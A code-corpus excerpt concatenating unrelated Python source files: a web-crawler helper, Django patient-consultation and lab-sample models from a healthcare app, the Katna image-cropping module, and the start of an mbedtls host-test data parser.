def process_url(url):
"""
Given a url, strip scheme, 'www' and ending '/'
"""
# Remove scheme before comparison (slice off the prefix; str.lstrip strips a
# character set, not a prefix)
if url.startswith('http://'):
url = url[len('http://'):]
if url.startswith('https://'):
url = url[len('https://'):]
# Remove 'www' before comparison
if url.startswith('www.'):
url = url[len('www.'):]
# Remove ending '/' before comparison
if url.endswith('/'):
url = url.rstrip('/')
return url
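# Example for process_url above: 'https://www.example.com/' -> 'example.com'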
def get_images(self):
"""
Get all images from self.url
"""
scheme, host = urlparse(self.url)[:2]
response = requests.get(self.url)
s = BeautifulSoup(response.text, "html.parser")
for link in s.findAll('img'):
src = link.get('src')
if src:
# If base64 encode images, skip
if src.startswith('data:'):
continue
# If src start with '//', add scheme
elif src.startswith('//'):
yield scheme + ':' + src
# If links starts with '/', add scheme and host
elif src.startswith('/'):
yield scheme + '://' + host + src
else:
yield src
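# Usage sketch (illustrative; needs network access and a reachable start URL):
#   crawler = Crawler('https://example.com', max_depth=2)
#   links = crawler.get_links()           # up to Crawler.max_links same-domain URLs
#   images = list(crawler.get_images())   # image URLs found on the start page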
``` |
{
"source": "jibinkmathew94/care",
"score": 2
} |
#### File: facility/models/patient_consultation.py
```python
from django.db import models
from multiselectfield import MultiSelectField
from care.facility.models import CATEGORY_CHOICES, PatientBaseModel
from care.facility.models.mixins.permissions.patient import PatientRelatedPermissionMixin
from care.facility.models.patient_base import ADMIT_CHOICES, CURRENT_HEALTH_CHOICES, SYMPTOM_CHOICES, SuggestionChoices
from care.users.models import User
class PatientConsultation(PatientBaseModel, PatientRelatedPermissionMixin):
SUGGESTION_CHOICES = [
(SuggestionChoices.HI, "HOME ISOLATION"),
(SuggestionChoices.A, "ADMISSION"),
(SuggestionChoices.R, "REFERRAL"),
]
patient = models.ForeignKey("PatientRegistration", on_delete=models.CASCADE, related_name="consultations")
facility = models.ForeignKey("Facility", on_delete=models.CASCADE, related_name="consultations")
symptoms = MultiSelectField(choices=SYMPTOM_CHOICES, default=1, null=True, blank=True)
other_symptoms = models.TextField(default="", blank=True)
symptoms_onset_date = models.DateTimeField(null=True, blank=True)
category = models.CharField(choices=CATEGORY_CHOICES, max_length=8, default=None, blank=True, null=True)
examination_details = models.TextField(null=True, blank=True)
existing_medication = models.TextField(null=True, blank=True)
prescribed_medication = models.TextField(null=True, blank=True)
suggestion = models.CharField(max_length=3, choices=SUGGESTION_CHOICES)
referred_to = models.ForeignKey(
"Facility", null=True, blank=True, on_delete=models.PROTECT, related_name="referred_patients",
)
admitted = models.BooleanField(default=False)
admitted_to = models.IntegerField(choices=ADMIT_CHOICES, default=None, null=True, blank=True)
admission_date = models.DateTimeField(null=True, blank=True)
discharge_date = models.DateTimeField(null=True, blank=True)
bed_number = models.CharField(max_length=100, null=True, blank=True)
def __str__(self):
return f"{self.patient.name}<>{self.facility.name}"
def save(self, *args, **kwargs):
if not self.pk or self.referred_to is not None:
# pk is None when the consultation is created
# referred to is not null when the person is being referred to a new facility
self.patient.facility = self.referred_to or self.facility
self.patient.save()
super(PatientConsultation, self).save(*args, **kwargs)
class Meta:
constraints = [
models.CheckConstraint(
name="if_referral_suggested",
check=~models.Q(suggestion=SuggestionChoices.R) | models.Q(referred_to__isnull=False),
),
models.CheckConstraint(
name="if_admitted", check=models.Q(admitted=False) | models.Q(admission_date__isnull=False),
),
]
class DailyRound(PatientBaseModel):
consultation = models.ForeignKey(PatientConsultation, on_delete=models.PROTECT, related_name="daily_rounds")
temperature = models.DecimalField(max_digits=5, decimal_places=2, blank=True, default=0)
temperature_measured_at = models.DateTimeField(null=True, blank=True)
physical_examination_info = models.TextField(null=True, blank=True)
additional_symptoms = MultiSelectField(choices=SYMPTOM_CHOICES, default=1, null=True, blank=True)
other_symptoms = models.TextField(default="", blank=True)
patient_category = models.CharField(choices=CATEGORY_CHOICES, max_length=8, default=None, blank=True, null=True)
current_health = models.IntegerField(default=0, choices=CURRENT_HEALTH_CHOICES, blank=True)
recommend_discharge = models.BooleanField(default=False, verbose_name="Recommend Discharging Patient")
other_details = models.TextField(null=True, blank=True)
@staticmethod
def has_write_permission(request):
return request.user.is_superuser or (
request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
and (
request.user
in PatientConsultation.objects.get(
external_id=request.parser_context["kwargs"]["consultation_external_id"]
).facility.users.all()
)
)
@staticmethod
def has_read_permission(request):
return request.user.is_superuser or (
request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
and (
request.user
in PatientConsultation.objects.get(
external_id=request.parser_context["kwargs"]["consultation_external_id"]
).facility.users.all()
)
)
def has_object_read_permission(self, request):
return (
request.user.is_superuser
or request.user in (self.consultation.facility.created_by, self.consultation.patient.created_by,)
or request.user in self.consultation.patient.facility.users.all()
)
def has_object_write_permission(self, request):
return (
request.user.is_superuser
or request.user in (self.consultation.facility.created_by, self.consultation.patient.created_by,)
or request.user in self.consultation.facility.users.all()
)
```
#### File: facility/models/patient_sample.py
```python
from django.db import models
from care.facility.models import FacilityBaseModel, PatientRegistration
from care.users.models import User
SAMPLE_TYPE_CHOICES = [
(0, "UNKNOWN"),
(1, "BA/ETA"),
(2, "TS/NPS/NS"),
(3, "Blood in EDTA"),
(4, "Acute Sera"),
(5, "Convalescent sera"),
(6, "OTHER TYPE"),
]
class PatientSample(FacilityBaseModel):
SAMPLE_TEST_RESULT_MAP = {"POSITIVE": 1, "NEGATIVE": 2, "AWAITING": 3, "INVALID": 4}
SAMPLE_TEST_RESULT_CHOICES = [(v, k) for k, v in SAMPLE_TEST_RESULT_MAP.items()]
PATIENT_ICMR_CATEGORY = [
(0, "Cat 0"),
(10, "Cat 1"),
(20, "Cat 2"),
(30, "Cat 3"),
(40, "Cat 4"),
(50, "Cat 5a"),
(60, "Cat 5b"),
]
SAMPLE_TEST_FLOW_MAP = {
"REQUEST_SUBMITTED": 1,
"APPROVED": 2,
"DENIED": 3,
"SENT_TO_COLLECTON_CENTRE": 4,
"RECEIVED_AND_FORWARED": 5,
"RECEIVED_AT_LAB": 6,
"COMPLETED": 7,
}
SAMPLE_TEST_FLOW_CHOICES = [(v, k) for k, v in SAMPLE_TEST_FLOW_MAP.items()]
SAMPLE_FLOW_RULES = {
# previous rule # next valid rules
"REQUEST_SUBMITTED": {"APPROVED", "DENIED",},
"APPROVED": {"SENT_TO_COLLECTON_CENTRE", "RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB", "COMPLETED"},
"DENIED": {"REQUEST_SUBMITTED"},
"SENT_TO_COLLECTON_CENTRE": {"RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB", "COMPLETED"},
"RECEIVED_AND_FORWARED": {"RECEIVED_AT_LAB", "COMPLETED"},
"RECEIVED_AT_LAB": {"COMPLETED"},
}
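# Illustrative check (not part of the model): SAMPLE_FLOW_RULES can be used to
# validate a status transition, e.g.
#   "COMPLETED" in PatientSample.SAMPLE_FLOW_RULES["APPROVED"]   # -> True
# whereas looking up "COMPLETED" as a key raises KeyError, since completed
# samples have no outgoing transitions.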
patient = models.ForeignKey(PatientRegistration, on_delete=models.PROTECT)
consultation = models.ForeignKey("PatientConsultation", on_delete=models.PROTECT)
sample_type = models.IntegerField(choices=SAMPLE_TYPE_CHOICES, default=0)
sample_type_other = models.TextField(default="")
has_sari = models.BooleanField(default=False)
has_ari = models.BooleanField(default=False)
doctor_name = models.CharField(max_length=255, default="NO DOCTOR SPECIFIED")
diagnosis = models.TextField(default="")
diff_diagnosis = models.TextField(default="")
etiology_identified = models.TextField(default="")
is_atypical_presentation = models.BooleanField(default=False)
atypical_presentation = models.TextField(default="")
is_unusual_course = models.BooleanField(default=False)
icmr_category = models.IntegerField(choices=PATIENT_ICMR_CATEGORY, default=0)
icmr_label = models.CharField(max_length=200, default="")
status = models.IntegerField(choices=SAMPLE_TEST_FLOW_CHOICES, default=SAMPLE_TEST_FLOW_MAP["REQUEST_SUBMITTED"])
result = models.IntegerField(choices=SAMPLE_TEST_RESULT_CHOICES, default=SAMPLE_TEST_RESULT_MAP["AWAITING"])
fast_track = models.TextField(default="")
date_of_sample = models.DateTimeField(null=True, blank=True)
date_of_result = models.DateTimeField(null=True, blank=True)
@property
def flow(self):
try:
return self.flow_prefetched
except AttributeError:
return self.patientsampleflow_set.order_by("-created_date")
@staticmethod
def has_write_permission(request):
return request.user.is_superuser or request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
@staticmethod
def has_read_permission(request):
return request.user.is_superuser or request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
def has_object_read_permission(self, request):
return (
request.user.is_superuser
or request.user == self.consultation.facility.created_by
or (
request.user.district == self.consultation.facility.district
and request.user.user_type >= User.TYPE_VALUE_MAP["DistrictLabAdmin"]
)
or (
request.user.state == self.consultation.facility.state
and request.user.user_type >= User.TYPE_VALUE_MAP["StateLabAdmin"]
)
or request.user in self.consultation.patient.facility.users.all()
)
def has_object_update_permission(self, request):
if not self.has_object_read_permission(request):
return False
if request.user.is_superuser:
return True
map_ = self.SAMPLE_TEST_FLOW_CHOICES
if map_[self.status - 1][1] in ("REQUEST_SUBMITTED", "SENT_TO_COLLECTON_CENTRE"):
return request.user.user_type >= User.TYPE_VALUE_MAP["DistrictLabAdmin"]
elif map_[self.status - 1][1] in ("APPROVED", "DENIED"):
return request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
elif map_[self.status - 1][1] in ("RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB"):
return request.user.user_type >= User.TYPE_VALUE_MAP["StateLabAdmin"]
# The view shall raise a 400
return True
def has_object_destroy_permission(self, request):
return request.user.is_superuser
class PatientSampleFlow(FacilityBaseModel):
patient_sample = models.ForeignKey(PatientSample, on_delete=models.PROTECT)
status = models.IntegerField(choices=PatientSample.SAMPLE_TEST_FLOW_CHOICES)
notes = models.CharField(max_length=255)
created_by = models.ForeignKey(User, on_delete=models.PROTECT)
```
#### File: facility/summarisation/facility_capacity.py
```python
from datetime import timedelta
from celery.decorators import periodic_task
from django.utils.decorators import method_decorator
from django.views.decorators.cache import cache_page
from rest_framework import status, viewsets
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from care.facility.api.serializers.facility import FacilitySerializer
from care.facility.api.serializers.facility_capacity import FacilityCapacitySerializer
from care.facility.models import FacilityCapacity
from care.users.models import User
class FacilityCapacitySummary(viewsets.ViewSet):
permission_classes = (IsAuthenticated,)
@method_decorator(cache_page(60 * 60 * 6))
def list(self, request, format=None):
if request.user.user_type < User.TYPE_VALUE_MAP["DistrictLabAdmin"]:
return Response({}, status=status.HTTP_403_FORBIDDEN)
possible_filter_params = ["state", "local_body", "district"]
filter_params = {}
for filter_query in possible_filter_params:
if request.GET.get(filter_query, False):
filter_params["facility__" + filter_query] = int(request.GET[filter_query])
capacity_objects = FacilityCapacity.objects.filter(**filter_params).select_related(
"facility", "facility__state", "facility__district", "facility__local_body"
)
capacity_summary = {}
for capacity_object in capacity_objects:
facility_id = capacity_object.facility.id
if facility_id not in capacity_summary:
capacity_summary[facility_id] = FacilitySerializer(capacity_object.facility).data
capacity_summary[facility_id]["availability"] = []
capacity_summary[facility_id]["availability"].append(FacilityCapacitySerializer(capacity_object).data)
return Response(capacity_summary)
@periodic_task(run_every=timedelta(seconds=1500))
def facilitySummary():
print("Testing Summarisation Again")
``` |
{
"source": "jibinmathew691993/PythonHackerrank",
"score": 4
} |
#### File: jibinmathew691993/PythonHackerrank/Swap Case.py
```python
def swap_case(s):
return "".join([char.lower() if char.isupper() else char.upper() for char in s])
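# Example: swap_case("Www.HackerRank.com") -> "wWW.hACKERrANK.COM"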
if __name__ == '__main__':
print(swap_case(input()))
``` |
{
"source": "jibinmathew69/katna",
"score": 3
} |
#### File: katna/Katna/image.py
```python
import os
import cv2
import numpy as np
from Katna.decorators import FileDecorators
from Katna.feature_list import FeatureList
from Katna.filter_list import FilterList
from Katna.crop_extractor import CropExtractor
from Katna.crop_selector import CropSelector
import Katna.config as config
from Katna.decorators import DebugDecorators
class UserFiltersEnum:
"""Enum class for filters"""
text = "TextDetector"
class Image(object):
"""Class for all image cropping operations
:param object: base class inheritance
:type object: class:`Object`
"""
def __init__(self, disable_text=True):
"""Constructor for image files"""
featureList = FeatureList()
filterList = FilterList()
self.user_filters_enum = UserFiltersEnum()
self.crop_extractor = CropExtractor()
self.crop_selector = CropSelector()
self.features = featureList.get_features()
self.definedFilters = filterList.get_filters()
def _get_crop_specs(
self, image_height, image_width, ratio_height, ratio_width, is_height_small=True
):
"""Internal function to create the crop specs for a given aspect ratio
:param image_height: height of image
:type image_height: int, required
:param image_width: width of image
:type image_width: int, required
:param ratio_height: aspect ratio height (eg. 3 from 4:3)
:type ratio_height: int, required
:param ratio_width: aspect ratio width (eg. 4 from 4:3)
:type ratio_width: int, required
:param is_height_small: parameter to check if crop dimension should be reduced wrt height[default=True]
:type is_height_small: boolean, required
:return: list of crop height and crop width
:rtype:list of tuples
"""
# multiplication factor by which height/width of crop should be decreased to get crop specs
multiply_by = 1
crop_list_tuple = []
# Calculating the height and width ratio wrt aspect ratio
hr, wr = image_height / ratio_height, image_width / ratio_width
# print("hr, wr",hr, wr)
# Check if height is smaller than the width.If yes, interchange height and width.
if not is_height_small:
image_height, image_width = image_width, image_height
hr, wr = wr, hr
crop_height, crop_width = image_height, hr * ratio_width
# Decreasing the height and width for crops while checking it don't get small by 1/(min) of image height/width
while True:
if not (
(crop_height >= (image_height // config.Image.min_image_to_crop_factor))
and (
crop_width >= (image_width // config.Image.min_image_to_crop_factor)
)
):
break
crop_height, crop_width = (
int(crop_height),
int((ratio_width / ratio_height) * crop_height),
)
crop_list_tuple.append((crop_height, crop_width))
crop_height /= multiply_by
crop_height, crop_width = (
int(crop_height),
int((ratio_width / ratio_height) * crop_height),
)
multiply_by += config.Image.crop_height_reduction_factor_in_each_iteration
return crop_list_tuple
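# Illustrative example (not from the library docs): for a 1920x1080 image and a
# 4:3 target (ratio_width=4, ratio_height=3, is_height_small=True), the first
# candidate spec is (1080, 1440), the tallest 4:3 crop that fits; successive
# specs divide the height by a growing factor (driven by
# config.Image.crop_height_reduction_factor_in_each_iteration) until either
# dimension falls below 1/min_image_to_crop_factor of the image size.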
# Apply optional Debug mode decorator , If config=DEBUG is true this decorator
# will populate internal variables of Image module.debug_images with debug images
# Which you can see by opencv Imshow to check if every feature is working as expected
@DebugDecorators.add_optional_debug_images_for_image_module
def crop_image_from_cvimage(
self,
input_image,
crop_width,
crop_height,
num_of_crops,
filters=[],
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly crops the imaged based on the specification - width and height
:param input_image: Input image
:type input_image: numpy array, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop height
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param filters: filters to be applied for cropping(only returns crops containing english text where the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: crop list
:rtype: list of structure crop_rect
"""
self.crop_extractor.down_sample_factor = down_sample_factor
if (
input_image.shape[0] + 5 <= crop_height
or input_image.shape[1] + 5 <= crop_width
):
# print(
# "Error: crop width or crop height larger than Image",
# "input_image.shape",
# input_image.shape,
# "crop_width",
# crop_width,
# "crop_height",
# crop_height,
# )
return []
extracted_candidate_crops = self.crop_extractor.extract_candidate_crops(
input_image, crop_width, crop_height, self.features
)
# print(extracted_candidate_crops)
# text: TextDetector
# dummy: DummyDetector
self.filters = []
for x in filters:
try:
self.filters.append(eval("self.user_filters_enum." + x))
except AttributeError as e:
print(str(e))
# self.filters = [eval("user_filters_enum."+x) for x in filters]
crops_list = self.crop_selector.select_candidate_crops(
input_image,
num_of_crops,
extracted_candidate_crops,
self.definedFilters,
self.filters,
)
return crops_list
def _extract_crop_for_files_iterator(
self,
list_of_files,
crop_width,
crop_height,
num_of_crops,
filters,
down_sample_factor,
):
"""Generator which yields crop data / error for filepaths in a list
:param list_of_files: list of files to process for crop
:type list_of_files: list, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop height
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:yield: dict containing error (if any), data ,and filepath of image processed
:rtype: dict
"""
for filepath in list_of_files:
print("Running for : ", filepath)
try:
crop_list = self._crop_image(
filepath,
crop_width,
crop_height,
num_of_crops,
filters,
down_sample_factor,
)
yield {"crops": crop_list, "error": None, "filepath": filepath}
except Exception as e:
yield {"crops": None, "error": e, "filepath": filepath}
@FileDecorators.validate_dir_path
def crop_image_from_dir(
self,
dir_path,
crop_width,
crop_height,
num_of_crops,
writer,
filters=[],
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly crops all the images (inside a directory) based on the specification - width and height
:param dir_path: Input Directory path
:type dir_path: str, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop height
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param writer: writer object used to save or process the generated crops
:type writer: Writer
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: crop dict with key as filepath and crop list for the file
:rtype: dict
"""
valid_files = []
all_crops = {}
for path, subdirs, files in os.walk(dir_path):
for filename in files:
filepath = os.path.join(path, filename)
if self._check_if_valid_image(filepath):
valid_files.append(filepath)
if len(valid_files) > 0:
generator = self._extract_crop_for_files_iterator(
valid_files,
crop_width,
crop_height,
num_of_crops,
filters,
down_sample_factor
)
for data in generator:
file_path = data["filepath"]
file_crops = data["crops"]
error = data["error"]
if error is None:
writer.write(file_path, file_crops)
print("Completed processing for : ", file_path)
else:
print("Error processing file : ", file_path)
print(error)
else:
print("All the files in directory %s are invalid image files" % dir_path)
def _crop_image(
self,
file_path,
crop_width,
crop_height,
num_of_crops,
filters=[],
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly crops the imaged based on the specification - width and height
:param file_path: Input file path
:type file_path: str, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop heigh
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: crop list
:rtype: list of structure crop_rect
"""
imgFile = cv2.imread(file_path)
crop_list = self.crop_image_from_cvimage(
input_image=imgFile,
crop_width=crop_width,
crop_height=crop_height,
num_of_crops=num_of_crops,
filters=filters,
down_sample_factor=down_sample_factor,
)
return crop_list
@FileDecorators.validate_file_path
def crop_image(
self,
file_path,
crop_width,
crop_height,
num_of_crops,
writer,
filters=[],
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly crops the imaged based on the specification - width and height
:param file_path: Input file path
:type file_path: str, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop height
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param writer: writer object to process data
:type writer: Writer, required
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: crop list
:rtype: list of structure crop_rect
"""
crop_list = self._crop_image(
file_path,
crop_width,
crop_height,
num_of_crops,
filters=filters,
down_sample_factor=down_sample_factor
)
writer.write(file_path, crop_list)
@FileDecorators.validate_file_path
def crop_image_with_aspect(
self,
file_path,
crop_aspect_ratio,
num_of_crops,
writer,
filters=[],
down_sample_factor=8
):
"""smartly crops the imaged based on the aspect ratio and returns number of specified crops for each crop spec found in the image with
the specified aspect ratio
:param file_path: Input file path
:type file_path: str, required
:param crop_aspect_ratio: output crop ratio
:type crop_aspect_ratio: str (eg. '4:3')
:param num_of_crops: number of crops required
:type num_of_crops: int
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:param writer: writer to process the image
:type writer: Writer, required
:return: crop list
:rtype: list of structure crop_rect
"""
imgFile = cv2.imread(file_path)
image_height, image_width, _ = imgFile.shape
ratio_width, ratio_height = map(int, crop_aspect_ratio.split(":"))
crop_list = self._generate_crop_options_given_for_given_aspect_ratio(
imgFile,
image_width,
image_height,
ratio_width,
ratio_height,
num_of_crops=num_of_crops,
filters=filters,
down_sample_factor=down_sample_factor,
)
sorted_list = sorted(crop_list, key=lambda x: float(x.score), reverse=True)
crop_list = sorted_list[:num_of_crops]
writer.write(file_path, crop_list)
#
@FileDecorators.validate_file_path
def save_crop_to_disk(self, crop_rect, frame, file_path, file_name, file_ext, rescale=False):
"""saves an in-memory crop on drive.
:param crop_rect: In-memory crop_rect.
:type crop_rect: crop_rect, required
:param frame: In-memory input image.
:type frame: numpy.ndarray, required
:param file_name: name of the image.
:type file_name: str, required
:param file_path: Folder location where files needs to be saved
:type file_path: str, required
:param file_ext: File extension indicating the file type for example - '.jpg'
:type file_ext: str, required
:return: None
"""
cropped_img = crop_rect.get_image_crop(frame)
file_full_path = os.path.join(file_path, file_name + file_ext)
cv2.imwrite(file_full_path, cropped_img)
@FileDecorators.validate_file_path
def resize_image(
self,
file_path,
target_width,
target_height,
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly resizes the image based on the specification - width and height
:param file_path: Input file path
:type file_path: str, required
:param target_width: output image width
:type target_width: int
:param target_height: output image height
:type target_height: int
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: resized image
:rtype: cv_image
"""
if not self._check_if_valid_image(file_path):
print("Error: Invalid Image, check image path: ", file_path)
return
imgFile = cv2.imread(file_path)
input_image_height, input_image_width, _ = imgFile.shape
target_image_aspect_ratio = target_width / target_height
input_image_aspect_ratio = input_image_width / input_image_height
if input_image_aspect_ratio == target_image_aspect_ratio:
target_image = cv2.resize(imgFile, (target_width, target_height))
return target_image
else:
crop_list = self._generate_crop_options_given_for_given_aspect_ratio(
imgFile,
input_image_width,
input_image_height,
target_width,
target_height,
num_of_crops=1,
filters=[],
down_sample_factor=down_sample_factor,
)
# From list of crop options sort and get best crop using crop score variables in each
# crop option
sorted_list = sorted(crop_list, key=lambda x: float(x.score), reverse=True)
# Get top crop image
resized_image = sorted_list[0].get_image_crop(imgFile)
target_image = cv2.resize(resized_image, (target_width, target_height))
return target_image
def resize_from_cvimage(
self,
cv_image,
target_width,
target_height,
down_sample_factor=config.Image.down_sample_factor
):
"""smartly resizes a cv image based on the specification - width and height
:param cv_image: Input cv_image
:type cv_image: numpy.ndarray object , required
:param target_width: output image width
:type target_width: int
:param target_height: output image height
:type target_height: int
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: resized image
:rtype: cv_image
"""
input_image_height, input_image_width, _ = cv_image.shape
target_image_aspect_ratio = target_width / target_height
input_image_aspect_ratio = input_image_width / input_image_height
if input_image_aspect_ratio == target_image_aspect_ratio:
target_image = cv2.resize(cv_image, (target_width, target_height))
return target_image
else:
crop_list = self._generate_crop_options_given_for_given_aspect_ratio(
cv_image,
input_image_width,
input_image_height,
target_width,
target_height,
num_of_crops=1,
filters=[],
down_sample_factor=down_sample_factor,
)
sorted_list = sorted(crop_list, key=lambda x: float(x.score), reverse=True)
resized_image = sorted_list[0].get_image_crop(cv_image)
target_image = cv2.resize(resized_image, (target_width, target_height))
return target_image
def _generate_crop_options_given_for_given_aspect_ratio(
self,
imgFile,
input_image_width,
input_image_height,
target_width,
target_height,
num_of_crops,
filters,
down_sample_factor,
):
""" Internal function to which for given aspect ratio (target_width/target_height)
Generates ,scores and returns list of image crops
:param imgFile: Input image
:type imgFile: opencv image
:param input_image_width: input image width
:type input_image_width: int
:param input_image_height: input image height
:type input_image_height: int
:param target_width: target aspect ratio width
:type target_width: int
:param target_height: target aspect ratio height
:type target_height: int
:param num_of_crops: number of crop needed in the end
:type num_of_crops: int
:param filters: filters
:type filters: list of filters
:param down_sample_factor: image down sample factor for optimizing processing time
:type down_sample_factor: int
:return: list of candidate crop rectangles as per input aspect ratio
:rtype: list of CropRect
"""
crop_list_tuple, crop_list = [], []
# Calculate height ratio and width ratio of input and target image
height_ratio, width_ratio = (
input_image_height / target_height,
input_image_width / target_width,
)
# Generate candidate crops, _get_crop_spec function changes it's behavior based
# on whether height_ratio is greater or smaller than width ratio.
if height_ratio <= width_ratio:
crop_list_tuple += self._get_crop_specs(
input_image_height,
input_image_width,
target_height,
target_width,
is_height_small=True,
)
else: # elif width_ratio < height_ratio:
crop_list_tuple += self._get_crop_specs(
input_image_height,
input_image_width,
target_height,
target_width,
is_height_small=False,
)
# For each of crop_specifications generated by _get_crop_spec() function
# generate actual crop as well as give score to each of these crop
for crop_height, crop_width in crop_list_tuple:
crop_list += self.crop_image_from_cvimage(
input_image=imgFile,
crop_width=crop_width,
crop_height=crop_height,
num_of_crops=num_of_crops,
filters=filters,
down_sample_factor=down_sample_factor,
)
return crop_list
@FileDecorators.validate_dir_path
def resize_image_from_dir(
self,
dir_path,
target_width,
target_height,
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly resizes all the images (inside a directory) based on the specification - width and height
:param dir_path: Input Directory path
:type dir_path: str, required
:param target_width: output width
:type target_width: int
:param target_height: output height
:type target_height: int
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: dict with key as filepath and resized image as in opencv format as value
:rtype: dict
"""
all_resized_images = {}
for path, subdirs, files in os.walk(dir_path):
for filename in files:
filepath = os.path.join(path, filename)
image_file_path = os.path.join(path, filename)
if self._check_if_valid_image(image_file_path):
resized_image = self.resize_image(
image_file_path, target_width, target_height, down_sample_factor
)
all_resized_images[filepath] = resized_image
else:
print("Error: Not a valid image file:", image_file_path)
return all_resized_images
@FileDecorators.validate_file_path
def save_image_to_disk(self, image, file_path, file_name, file_ext):
"""saves an in-memory image obtained from image resize on drive.
:param image: In-memory input image.
:type image: numpy.ndarray, required
:param file_name: name of the image.
:type file_name: str, required
:param file_path: Folder location where files needs to be saved
:type file_path: str, required
:param file_ext: File extension indicating the file type for example - '.jpg'
:type file_ext: str, required
:return: None
"""
file_full_path = os.path.join(file_path, file_name + file_ext)
cv2.imwrite(file_full_path, image)
@FileDecorators.validate_file_path
def _check_if_valid_image(self, file_path):
"""Function to check if given image file is a valid image compatible with
opencv
:param file_path: image filename
:type file_path: str
:return: Return True if valid image file else False
:rtype: bool
"""
try:
frame = cv2.imread(file_path)
# Making sure video frame is not empty
if frame is not None:
return True
else:
return False
except cv2.error as e:
print("cv2.error:", e)
return False
except Exception as e:
print("Exception:", e)
return False
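# Usage sketch (illustrative paths and sizes; a Writer implementation from the
# library is assumed for the file-based APIs):
#   img_module = Image()
#   frame = cv2.imread("/tmp/photo.jpg")
#   crops = img_module.crop_image_from_cvimage(frame, crop_width=300,
#                                              crop_height=200, num_of_crops=3)
#   resized = img_module.resize_from_cvimage(frame, target_width=500,
#                                            target_height=500)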
``` |
{
"source": "jiblime/mbedtls",
"score": 2
} |
#### File: tests/scripts/mbedtls_test.py
```python
import re
import os
import binascii
from mbed_host_tests import BaseHostTest, event_callback # pylint: disable=import-error
class TestDataParserError(Exception):
"""Indicates error in test data, read from .data file."""
pass
class TestDataParser(object):
"""
Parses test name, dependencies, test function name and test parameters
from the data file.
"""
def __init__(self):
"""
Constructor
"""
self.tests = []
def parse(self, data_file):
"""
Data file parser.
:param data_file: Data file path
"""
with open(data_file, 'r') as data_f:
self.__parse(data_f)
@staticmethod
def __escaped_split(inp_str, split_char):
"""
Splits inp_str on split_char except when escaped.
:param inp_str: String to split
:param split_char: Split character
:return: List of splits
"""
split_colon_fn = lambda x: re.sub(r'\\' + split_char, split_char, x)
if len(split_char) > 1:
raise ValueError('Expected split character. Found string!')
out = list(map(split_colon_fn, re.split(r'(?<!\\)' + split_char, inp_str)))
out = [x for x in out if x]
return out
def __parse(self, data_f):
"""
Parses data file using supplied file object.
:param data_f: Data file object
:return:
"""
for line in data_f:
line = line.strip()
if not line:
continue
# Read test name
name = line
# Check dependencies
dependencies = []
line = next(data_f).strip()
match = re.search('depends_on:(.*)', line)
if match:
dependencies = [int(x) for x in match.group(1).split(':')]
line = next(data_f).strip()
# Read test vectors
line = line.replace('\\n', '\n')
parts = self.__escaped_split(line, ':')
function_name = int(parts[0])
args = parts[1:]
args_count = len(args)
if args_count % 2 != 0:
err_str_fmt = "Number of test arguments({}) should be even: {}"
raise TestDataParserError(err_str_fmt.format(args_count, line))
grouped_args = [(args[i * 2], args[(i * 2) + 1])
for i in range(int(len(args)/2))]
self.tests.append((name, function_name, dependencies,
grouped_args))
def get_test_data(self):
"""
Returns test data.
"""
return self.tests
class MbedTlsTest(BaseHostTest):
"""
Host test for Mbed TLS unit tests. This script is loaded at
run time by Greentea for executing Mbed TLS test suites. Each
communication from the target is received in this object as
an event, which is then handled by the event handler method
decorated by the associated event. Ex: @event_callback('GO').
Target test sends requests for dispatching next test. It reads
tests from the intermediate data file and sends test function
identifier, dependency identifiers, expression identifiers and
    the test data in binary form. The target test checks dependencies,
    evaluates integer constant expressions and dispatches the test
    function with the received test parameters. After the test function
